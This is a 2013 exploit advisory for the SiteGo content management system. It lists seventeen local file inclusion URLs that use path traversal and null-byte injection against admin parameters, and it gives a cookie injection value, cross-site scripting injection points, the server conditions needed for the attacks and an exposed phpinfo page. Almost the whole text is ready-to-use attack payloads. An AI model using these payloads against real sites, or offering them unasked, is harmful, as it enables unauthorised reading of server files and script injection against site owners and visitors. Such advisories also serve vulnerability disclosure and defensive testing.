#################################################
### Exploit Title: SiteGo Multiple Vulnerabilities
### Date: 02/07/2013 
### Author: L0n3ly-H34rT 
### Contact: l0n3ly_h34rt@hotmail.com 
### My Site: http://se3c.blogspot.com/ 
### Vendor Link: http://site-go.com/
### Software Link: http://site-go.com/free/site-go.zip
### Tested on: Linux/Windows 
#################################################

# Multiple Local File Inclusion :

http://127.0.0.1/site-go/admin/extra/contacts/DownloadMailAttach.php?file=../../../../../../../../../../windows/win.ini%00

http://127.0.0.1/site-go/admin/extra/StyleManager/EditFile.php?OpenFolder=../../../../../../../../../../windows/win.ini%00

http://127.0.0.1/site-go/admin/edit_config/index.php?idc=../../../../../../../../../../windows/win.ini%00

http://127.0.0.1/site-go/admin/extra/visitors/index.php?idv=../../../../../../../../../../windows/win.ini%00

http://127.0.0.1/site-go/admin/extra/stylemanager/index.php?ids=../../../../../../../../../../windows/win.ini%00

http://127.0.0.1/site-go/admin/extra/site_reports/index.php?idc=../../../../../../../../../../windows/win.ini%00

http://127.0.0.1/site-go/admin/extra/my_tools/index.php?idt=../../../../../../../../../../windows/win.ini%00

http://127.0.0.1/site-go/admin/extra/my_account/index.php?idm=../../../../../../../../../../windows/win.ini%00

http://127.0.0.1/site-go/admin/extra/mysql/index.php?idm=../../../../../../../../../../windows/win.ini%00

http://127.0.0.1/site-go/admin/extra/moderators/index.php?idm=../../../../../../../../../../windows/win.ini%00

http://127.0.0.1/site-go/admin/extra/mainlinks/index.php?idl=../../../../../../../../../../windows/win.ini%00

http://127.0.0.1/site-go/admin/extra/linksmanager/index.php?idl=../../../../../../../../../../windows/win.ini%00

http://127.0.0.1/site-go/admin/extra/ipdenymanager/index.php?idm=../../../../../../../../../../windows/win.ini%00

http://127.0.0.1/site-go/admin/extra/filesmanager/index.php?idf=../../../../../../../../../../windows/win.ini%00

http://127.0.0.1/site-go/admin/extra/feedout/index.php?idf=../../../../../../../../../../windows/win.ini%00

http://127.0.0.1/site-go/admin/extra/contacts/index.php?idc=../../../../../../../../../../windows/win.ini%00

http://127.0.0.1/site-go/admin/extra/backup/index.php?idb=../../../../../../../../../../windows/win.ini%00

Also Inject The Cookies In Main Page By This :

style_name=../../../../../../../../../../windows/win.ini%00

# XSS :

http://127.0.0.1/site-go/?action=vote&Browse=[XSS]

http://127.0.0.1/site-go/?action=MailList&articles=&B1=متابعة&delete=[XSS]&reason=1

Many Files is affect

#######################################################

# Notes :

1- Must be magic_quotes_gpc = Off

2- phpinfo() :

http://127.0.0.1/site-go/admin/include/phpinfo.php

3- Remote File Inclusion Doesn't Fix Yet ! :

http://www.exploit-db.com/exploits/21222/